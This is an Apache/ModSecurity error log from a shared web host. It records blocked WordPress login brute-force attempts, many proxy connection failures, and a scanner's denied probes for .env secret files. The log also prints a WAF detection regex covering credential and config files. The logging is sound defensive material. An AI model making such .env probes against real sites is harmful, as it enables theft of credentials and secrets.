[Tue May 26 18:58:51.802347 2026] [security2:error] [pid 1045635:tid 1045717] [remote 94.76.235.103:47094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgExhDcQXYr7SS5sUFVwAAF1E"]
[Tue May 26 18:58:52.373343 2026] [security2:error] [pid 1045635:tid 1045721] [remote 94.76.235.103:47094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgFBhDcQXYr7SS5sUFawAAUlU"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 18:58:53.522603 2026] [security2:error] [pid 1045635:tid 1045797] [client 158.173.3.20:2047] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWgFBhDcQXYr7SS5sUFdQAAACA"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 18:58:53.895737 2026] [security2:error] [pid 1045635:tid 1045772] [client 149.56.160.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.obinnawrites.com"] [uri "/index.php"] [unique_id "ahWgFRhDcQXYr7SS5sUFowAAAAc"]
[Tue May 26 18:58:54.147646 2026] [security2:error] [pid 1045635:tid 1045855] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgFRhDcQXYr7SS5sUFnQAAAFo"]
[Tue May 26 18:58:55.358285 2026] [security2:error] [pid 1045635:tid 1045731] [remote 194.213.4.139:55870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgFxhDcQXYr7SS5sUFxgAAcl8"]
[Tue May 26 18:58:55.912690 2026] [security2:error] [pid 1045635:tid 1045733] [remote 194.213.4.139:55870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgFxhDcQXYr7SS5sUF2QAAUmE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:58:56.365043 2026] [security2:error] [pid 1045635:tid 1045844] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgFxhDcQXYr7SS5sUF3AAAAE8"]
[Tue May 26 18:58:58.675105 2026] [security2:error] [pid 1045635:tid 1045813] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgGhhDcQXYr7SS5sUGFAAAADA"]
[Tue May 26 18:59:00.907089 2026] [security2:error] [pid 1045635:tid 1045860] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgHBhDcQXYr7SS5sUGSwAAAF8"]
[Tue May 26 18:59:01.329375 2026] [proxy:error] [pid 1045635:tid 1045871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:01.329440 2026] [proxy_http:error] [pid 1045635:tid 1045871] [client 208.84.101.20:48002] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:01.330026 2026] [proxy:error] [pid 1045635:tid 1045871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:01.330065 2026] [proxy_http:error] [pid 1045635:tid 1045871] [client 208.84.101.20:48002] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:01.330275 2026] [security2:error] [pid 1045635:tid 1045749] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgHRhDcQXYr7SS5sUGXAAAMHE"]
[Tue May 26 18:59:01.330481 2026] [security2:error] [pid 1045635:tid 1045813] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgHRhDcQXYr7SS5sUGXAAAMHE"]
[Tue May 26 18:59:02.271091 2026] [proxy:error] [pid 1045635:tid 1045815] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:02.271134 2026] [proxy_http:error] [pid 1045635:tid 1045815] [client 208.84.101.20:2110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:02.271706 2026] [proxy:error] [pid 1045635:tid 1045815] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:02.271736 2026] [proxy_http:error] [pid 1045635:tid 1045815] [client 208.84.101.20:2110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:03.536572 2026] [security2:error] [pid 1045635:tid 1045770] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgHxhDcQXYr7SS5sUGkAAAAAU"]
[Tue May 26 18:59:04.490004 2026] [proxy:error] [pid 1045635:tid 1045846] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.490084 2026] [proxy_http:error] [pid 1045635:tid 1045846] [client 208.84.101.20:48014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.490716 2026] [proxy:error] [pid 1045635:tid 1045846] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.490751 2026] [proxy_http:error] [pid 1045635:tid 1045846] [client 208.84.101.20:48014] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.632909 2026] [proxy:error] [pid 1045635:tid 1045870] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.632977 2026] [proxy_http:error] [pid 1045635:tid 1045870] [client 208.84.101.20:48110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.633569 2026] [proxy:error] [pid 1045635:tid 1045870] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.633600 2026] [proxy_http:error] [pid 1045635:tid 1045870] [client 208.84.101.20:48110] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.655132 2026] [proxy:error] [pid 1045635:tid 1045773] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.655193 2026] [proxy_http:error] [pid 1045635:tid 1045773] [client 208.84.101.20:48144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.655344 2026] [proxy:error] [pid 1045635:tid 1045877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.655400 2026] [proxy_http:error] [pid 1045635:tid 1045877] [client 208.84.101.20:48230] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.655790 2026] [proxy:error] [pid 1045635:tid 1045773] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.655824 2026] [proxy_http:error] [pid 1045635:tid 1045773] [client 208.84.101.20:48144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656000 2026] [proxy:error] [pid 1045635:tid 1045785] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656053 2026] [proxy_http:error] [pid 1045635:tid 1045785] [client 208.84.101.20:48206] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656151 2026] [proxy:error] [pid 1045635:tid 1045798] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656192 2026] [proxy_http:error] [pid 1045635:tid 1045798] [client 208.84.101.20:48218] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656304 2026] [proxy:error] [pid 1045635:tid 1045892] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656354 2026] [proxy_http:error] [pid 1045635:tid 1045892] [client 208.84.101.20:48258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656462 2026] [proxy:error] [pid 1045635:tid 1045829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656517 2026] [proxy_http:error] [pid 1045635:tid 1045829] [client 208.84.101.20:48188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656601 2026] [proxy:error] [pid 1045635:tid 1045778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656653 2026] [proxy_http:error] [pid 1045635:tid 1045778] [client 208.84.101.20:48194] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.656865 2026] [proxy:error] [pid 1045635:tid 1045856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.656933 2026] [proxy_http:error] [pid 1045635:tid 1045856] [client 208.84.101.20:48242] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657167 2026] [proxy:error] [pid 1045635:tid 1045829] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657201 2026] [proxy_http:error] [pid 1045635:tid 1045829] [client 208.84.101.20:48188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657299 2026] [proxy:error] [pid 1045635:tid 1045823] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657397 2026] [proxy_http:error] [pid 1045635:tid 1045823] [client 208.84.101.20:48160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657484 2026] [proxy:error] [pid 1045635:tid 1045798] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657520 2026] [proxy_http:error] [pid 1045635:tid 1045798] [client 208.84.101.20:48218] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657614 2026] [proxy:error] [pid 1045635:tid 1045884] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657661 2026] [proxy_http:error] [pid 1045635:tid 1045884] [client 208.84.101.20:48128] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657748 2026] [proxy:error] [pid 1045635:tid 1045785] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657786 2026] [proxy_http:error] [pid 1045635:tid 1045785] [client 208.84.101.20:48206] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657857 2026] [proxy:error] [pid 1045635:tid 1045892] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657885 2026] [proxy_http:error] [pid 1045635:tid 1045892] [client 208.84.101.20:48258] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.657956 2026] [proxy:error] [pid 1045635:tid 1045778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.657990 2026] [proxy_http:error] [pid 1045635:tid 1045778] [client 208.84.101.20:48194] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.658116 2026] [proxy:error] [pid 1045635:tid 1045853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.658162 2026] [proxy_http:error] [pid 1045635:tid 1045853] [client 208.84.101.20:48174] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.658442 2026] [proxy:error] [pid 1045635:tid 1045811] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.658481 2026] [proxy_http:error] [pid 1045635:tid 1045811] [client 208.84.101.20:48100] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.658570 2026] [proxy:error] [pid 1045635:tid 1045856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.658612 2026] [proxy_http:error] [pid 1045635:tid 1045856] [client 208.84.101.20:48242] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.658791 2026] [proxy:error] [pid 1045635:tid 1045877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.658852 2026] [proxy_http:error] [pid 1045635:tid 1045877] [client 208.84.101.20:48230] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.658958 2026] [proxy:error] [pid 1045635:tid 1045838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659003 2026] [proxy_http:error] [pid 1045635:tid 1045838] [client 208.84.101.20:48098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659099 2026] [proxy:error] [pid 1045635:tid 1045823] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659136 2026] [proxy_http:error] [pid 1045635:tid 1045823] [client 208.84.101.20:48160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659320 2026] [proxy:error] [pid 1045635:tid 1045790] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659350 2026] [proxy_http:error] [pid 1045635:tid 1045790] [client 208.84.101.20:48234] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659436 2026] [proxy:error] [pid 1045635:tid 1045884] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659472 2026] [proxy_http:error] [pid 1045635:tid 1045884] [client 208.84.101.20:48128] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659680 2026] [proxy:error] [pid 1045635:tid 1045838] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659718 2026] [proxy_http:error] [pid 1045635:tid 1045838] [client 208.84.101.20:48098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659801 2026] [proxy:error] [pid 1045635:tid 1045853] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659841 2026] [proxy_http:error] [pid 1045635:tid 1045853] [client 208.84.101.20:48174] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.659921 2026] [proxy:error] [pid 1045635:tid 1045790] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.659951 2026] [proxy_http:error] [pid 1045635:tid 1045790] [client 208.84.101.20:48234] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.660019 2026] [proxy:error] [pid 1045635:tid 1045782] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.660051 2026] [proxy_http:error] [pid 1045635:tid 1045782] [client 208.84.101.20:48172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.660190 2026] [proxy:error] [pid 1045635:tid 1045773] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.660230 2026] [proxy_http:error] [pid 1045635:tid 1045773] [client 208.84.101.20:48084] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.660469 2026] [security2:error] [pid 1045635:tid 1045862] [client 208.84.101.20:48066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahWgIBhDcQXYr7SS5sUGwQAAAGE"]
[Tue May 26 18:59:04.660713 2026] [proxy:error] [pid 1045635:tid 1045802] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.660798 2026] [proxy_http:error] [pid 1045635:tid 1045802] [client 208.84.101.20:48182] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.660890 2026] [proxy:error] [pid 1045635:tid 1045788] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.660936 2026] [proxy_http:error] [pid 1045635:tid 1045788] [client 208.84.101.20:48138] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.661018 2026] [proxy:error] [pid 1045635:tid 1045791] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.661055 2026] [proxy_http:error] [pid 1045635:tid 1045791] [client 208.84.101.20:48118] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.661518 2026] [proxy:error] [pid 1045635:tid 1045788] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.661550 2026] [proxy_http:error] [pid 1045635:tid 1045788] [client 208.84.101.20:48138] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.661679 2026] [proxy:error] [pid 1045635:tid 1045791] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.661712 2026] [proxy_http:error] [pid 1045635:tid 1045791] [client 208.84.101.20:48118] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.661831 2026] [proxy:error] [pid 1045635:tid 1045782] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.661869 2026] [proxy_http:error] [pid 1045635:tid 1045782] [client 208.84.101.20:48172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.661985 2026] [proxy:error] [pid 1045635:tid 1045773] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.662023 2026] [proxy_http:error] [pid 1045635:tid 1045773] [client 208.84.101.20:48084] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.662131 2026] [proxy:error] [pid 1045635:tid 1045802] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.662200 2026] [proxy_http:error] [pid 1045635:tid 1045802] [client 208.84.101.20:48182] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.662538 2026] [proxy:error] [pid 1045635:tid 1045815] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.662599 2026] [proxy_http:error] [pid 1045635:tid 1045815] [client 208.84.101.20:48136] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.662683 2026] [proxy:error] [pid 1045635:tid 1045811] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.662719 2026] [proxy_http:error] [pid 1045635:tid 1045811] [client 208.84.101.20:48100] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.662823 2026] [proxy:error] [pid 1045635:tid 1045818] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.662876 2026] [proxy_http:error] [pid 1045635:tid 1045818] [client 208.84.101.20:48146] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.663455 2026] [proxy:error] [pid 1045635:tid 1045815] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.663499 2026] [proxy_http:error] [pid 1045635:tid 1045815] [client 208.84.101.20:48136] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.663731 2026] [proxy:error] [pid 1045635:tid 1045818] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.663773 2026] [proxy_http:error] [pid 1045635:tid 1045818] [client 208.84.101.20:48146] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.663976 2026] [proxy:error] [pid 1045635:tid 1045767] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.664022 2026] [proxy_http:error] [pid 1045635:tid 1045767] [client 208.84.101.20:48220] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.664845 2026] [proxy:error] [pid 1045635:tid 1045767] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.664884 2026] [proxy_http:error] [pid 1045635:tid 1045767] [client 208.84.101.20:48220] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.795586 2026] [security2:error] [pid 1045635:tid 1045841] [client 208.84.101.20:48028] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWgIBhDcQXYr7SS5sUGxAAAAEw"]
[Tue May 26 18:59:04.795914 2026] [security2:error] [pid 1045635:tid 1045878] [client 208.84.101.20:48052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahWgIBhDcQXYr7SS5sUGwwAAAHE"]
[Tue May 26 18:59:04.796618 2026] [security2:error] [pid 1045635:tid 1045805] [client 208.84.101.20:48042] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahWgIBhDcQXYr7SS5sUGxgAAACg"]
[Tue May 26 18:59:04.796744 2026] [proxy:error] [pid 1045635:tid 1045824] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.796805 2026] [proxy_http:error] [pid 1045635:tid 1045824] [client 208.84.101.20:48068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.797004 2026] [proxy:error] [pid 1045635:tid 1045781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.797062 2026] [proxy_http:error] [pid 1045635:tid 1045781] [client 208.84.101.20:48034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.797407 2026] [proxy:error] [pid 1045635:tid 1045824] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.797452 2026] [proxy_http:error] [pid 1045635:tid 1045824] [client 208.84.101.20:48068] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.797673 2026] [proxy:error] [pid 1045635:tid 1045781] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.797707 2026] [proxy_http:error] [pid 1045635:tid 1045781] [client 208.84.101.20:48034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.797800 2026] [proxy:error] [pid 1045635:tid 1045783] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:04.797851 2026] [proxy_http:error] [pid 1045635:tid 1045783] [client 208.84.101.20:48032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:04.798419 2026] [proxy:error] [pid 1045635:tid 1045783] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
